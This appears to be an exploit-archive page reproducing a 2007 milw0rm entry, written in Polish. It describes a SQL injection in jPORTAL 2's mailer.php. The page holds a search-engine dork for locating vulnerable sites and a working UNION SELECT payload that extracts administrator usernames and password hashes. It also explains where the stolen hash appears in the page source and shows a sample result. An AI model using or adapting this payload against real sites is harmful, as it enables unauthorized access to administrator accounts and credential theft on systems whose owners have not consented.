[] NeoSense
E X P L O I T S
title author type platform port cve id

jPORTAL 2 - 'mailer.php' SQL Injection

Author: Kacper
type: webapps
platform: php
port: 
date_added: 2007-11-05 
date_updated: 2016-12-22 
verified: 1 
codes: OSVDB-39723;CVE-2007-5974;OSVDB-38749;CVE-2007-5912 
tags: 
aliases:  
screenshot_url:  
application_url: 
Tytul: jPORTAL 2 Remote SQL Injection Vulnerability
dork:[ intext:"jPORTAL 2" & inurl:"mailer.php" ]

Autor: Kacper
E-Mail: kacper1964@yahoo.pl
Strona: devilteam.eu

Irc: irc.myg0t.com #devilteam

Blad:

mailer.php?to=999999999999'+union+select+0,1,2,3,4,5,concat(nick,char(58),pass),7+from+admins+limit+1/*

po wykonaniu zapytania wystarczy zajrzec w xrodlo strony i poszukac:

<input type="hidden" name="cmd" value="sendmail"><input type="hidden" name="to" value="admin:9b3a80a898fabc984e733d904027cc91"></td>

value="admin:9b3a80a898fabc984e733d904027cc91" < ----/  to Twoj rezultat wykonania zapytania SQL.

be safe all  :)

# milw0rm.com [2007-11-06]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.